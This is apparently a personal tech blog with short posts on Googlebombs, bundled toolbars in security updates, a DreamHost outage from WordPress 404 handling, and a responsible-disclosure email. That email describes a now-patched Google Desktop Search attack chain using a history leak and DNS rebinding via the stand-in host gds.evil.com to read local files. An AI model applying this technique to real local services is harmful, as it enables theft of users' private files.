Accidental Googlebomb
Thursday, January 1st, 2009This Google search now maligns C++. Oops!
This Google search now maligns C++. Oops!
Google suggests holding tomorrow's leak meeting on a cruise ship.
Somehow I don't think that would work very well. Leaks and ships don't get along perfectly.
A Google search for "leave" still reflects the time when most porn sites had "age verification" on their front pages. "Age verification" often took the form of the text "You must be 18 to enter" followed by "Enter" and "Leave" links. The "Leave" link would often lead to a site appropriate for young kids or to a sex-education site.
Even today, when few new sites follow this practice, "Leave No Trace" and "Leave It To Beaver" are beaten by Yahoo, Google, Scarleteen, and Disney.
I wondered why Google's algorithm continued to make this possible despite tweaks to prevent Googlebombs such as "miserable failure". I came across this comment by Google engineer Matt Cutts:
[The algorithm change] really does have a very limited scope and doesn’t affect a large fraction of queries. The intent of the algorithm is to minimize the impact of “true†Googlebombs, which occur when someone is causing someone else’s page to rank for stuff that they wouldn’t want to rank for themselves. The algorithm could detect phrases such as [leave] as a Googlebomb in future iterations, but it doesn’t right now and I don’t think that Disney would care much either way.
Googlebombs were slightly embarrassing, but I imagine that abandoning link text would have hurt search quality a lot. I'm impressed that Google was able to come up with an algorithmic way to distinguish Googlebombs from other link text.
Google launched a free 411 service just in time for my move from San Diego to Mountain View. I found it useful, but it could have been even more useful if it:
Store hours would be nice too, but the service would also have to know when to say something like "Beach City Grill closes whenever the owner feels like closing, so you are advised to call before driving there."
Today's Java security update includes a checked-by-default "Install Google Toolbar for Internet Explorer" option. Shame on you, Sun and Google. Automatic security updates are no place to push unrelated, bundled software. Making security updates annoying hurts security almost as much as making security updates complicated: users will be less inclined to update next time.
This is similar to how Flash updates attempt to install the Yahoo Toolbar. It's certainly not as bad as the frequently updated AOL Instant Messenger, which turns on the "Today window" popup on every AIM account and adds a "Netscape ISP" icon to the desktop with every security update. But I thought Google was trying to set a good example.
Yesterday, at around 4pm, I noticed that the content on squarefree.com was missing, and the main page was an empty directory listing. I ssh'ed to my web server and noticed that the "squarefree.com" directory had been renamed to "squarefree.com_DISABLED_BY_DREAMHOST". Then I checked my email and saw a message from DreamHost support:
Hello,
I just had to disable your site squarefree.com as it's coming under some load and spawning countless php processes that are crashing the webserver. I wasn't able to figure out exactly what's going on, as leaving it up for more than a minute pretty much toasts the server. Please don't re-enable it until you've figured out what's going on, or disabled any possibly problematic php.
Thanks,
James
I jumped into #dreamhost on irc.freenode.net and started looking through my web server logs for suspicious requests. I was expecting to find that my blog had been DDoSed, perhaps by someone trying to leave comment spam. Instead, I found a large number of requests for non-existant files, falling into two categories:
But why would 404 requests create PHP processes? Due to a recent change in WordPress, Apache was directing each 404 request to WordPress. WordPress used to put detailed rules in .htaccess -- for example, it would ask Apache to direct requests for http://www.squarefree.com/2005/ to WordPress using RewriteRule ^([0-9]{4})/?$. But newer versions of WordPress instead ask Apache to send it all requests for nonexistent files. I imagine this puts less strain on Apache when a site uses lots of WordPress Pages, but it hurts when a site gets lots of 404 requests. Several months ago, I had instructed WordPress to serve my custom 404 page for these requests, but WordPress still had to do a lot of work to determine that the requests should be treated as 404s.
Once I realized what had happened, and determined that reconfiguring WordPress would be difficult, I did what I could to reduce the number of 404 requests WordPress would have to handle. I created a tiny favicon.ico file so those requests wouldn't be 404s, and I moved the Real-time HTML Editor onto its own subdomain so WordPress wouldn't handle the 404s it causes. My site was only down for 40 minutes, with the Real-time HTML Editor down a little longer while I waited for the new subdomain's DNS to propagate.
Some things DreamHost could have done better:
Some things DreamHost did right:
If anyone is wondering: yes, I still love DreamHost.
I released a new version of Search Keys to make it work with current versions of the Google and del.icio.us web sites. (Search Keys is a Firefox extension that lets you press a number to go to a result in a search engine, so you don't have to remove a hand from the keyboard after typing a search query.)
Google recently fixed several holes in Google Desktop Search that I found. This is the email I sent to security@google.com to report the holes:
This combination of security holes in mulitple products allows an attacker to read text files indexed and cached by Google Desktop Search. Its success rate is proportional to the amount of time the attacker can keep the victim on the attacker's site and the victim's CPU speed. I think all parts of this attack would work against both Firefox and Internet Explorer, but I've only tested part 1 and only in Firefox.
Recover the URL for the home page of Google Desktop Search
The URL for the front page of Google Desktop Search is http://127.0.0.1:4664/&s=nnnnnnnnnn for some 10-digit string nnnnnnnnnn. If the string is incorrect, GDS returns a page that says "Invalid Request". This seems to be a second line of defense against XSS and CSRF attacks.
Most browsers have information leaks that allow web scripts to determine whether a link is visited. The attacker assumes that the user has visited the GDS start page with the correct value for nnnnnnnnnn recently enough that the URL is in the browser's global history. Based on my experiments and calculations, it would take several days of CPU time for a script in an untrusted web page in Firefox to find out which of the 10^10 links of the form http://127.0.0.1:4664/&s=nnnnnnnnnn is visited. An attacker might try to keep a victim on a page for several days, or might try to keep a large number of users on his site for a shorter peroid of time. I don't know what algorithm generates the value nnnnnnnnnn, so I don't know if it has weaknesses that might allow the attacker's script to test fewer than 10^10 URLs.
Solutions: GDS could use a longer salt, to make iterating through every possible salt value harder. GDS could restrict salts to single use, but I think this would break too many things. Firefox (and other browsers) could plug the information leaks in global history.
References:
- https://bugzilla.mozilla.org/show_bug.cgi?id=57351
- https://bugzilla.mozilla.org/show_bug.cgi?id=147777
Perform a Princeton DNS attack
First, make gds.evil.com resolve to an IP under the control of the attacker, with a short TTL. Make the victim load http://gds.evil.com:4664/, which contains a script. Then make gds.evil.com resolve to 127.0.0.1. The script then creates an iframe that loads http://gds.evil.com:4664/&s=nnnnnnnnnnn and uses cross-frame scripting to control the page served by GDS.
You can check that GDS does not prevent this part of the attack by loading GDS and then replacing 127.0.0.1 in the URL with warez.squarefree.com (which resolves to 127.0.0.1).
Solutions: GDS could reject requests where the hostname is not "127.0.0.1" or "localhost" (IMO, the HTTP protocol requires it to do so). Firefox, Windows XP, the Windows XP firewall, or my ISP could prevent "external" DNS names from resolving to "internal" IP addresses.like 127.0.0.1.
References:
- http://www.cs.princeton.edu/sip/news/dns-scenario.html
- http://viper.haque.net/~timeless/blog/11/
- http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.2
- http://bugzilla.mozilla.org/show_bug.cgi?id=162871
- http://bugzilla.mozilla.org/show_bug.cgi?id=174590
- http://bugzilla.mozilla.org/show_bug.cgi?id=205726
- http://bugzilla.mozilla.org/show_bug.cgi?id=223861
Combining the holes
Once the attacker has script access to http://gds.evil.com:4664/, has gds.evil.com resolving to 127.0.0.1, and knows the hash for the home page, he can search for text files and view cached text files. (The links to cached text files are absolute and have 127.0.0.1 as the hostname, but they continue to work when 127.0.0.1 is replaced by warez.squarefree.com, which resolves to 127.0.0.1.)
I sent this email on Feb 13, 2005. The first part was fixed in version 20050227 by making the salt longer. The second part was fixed in version 20050325 by making GDS reject requests with hostnames other than "127.0.0.1" and "localhost". Google started pushing the updated version to existing users on June 2, 2005, so most users should be upgraded by now. You can see what version of GDS you have by clicking "About".
This is not the same as the hole found by Rice students (Slashdot article), which had been fixed previously.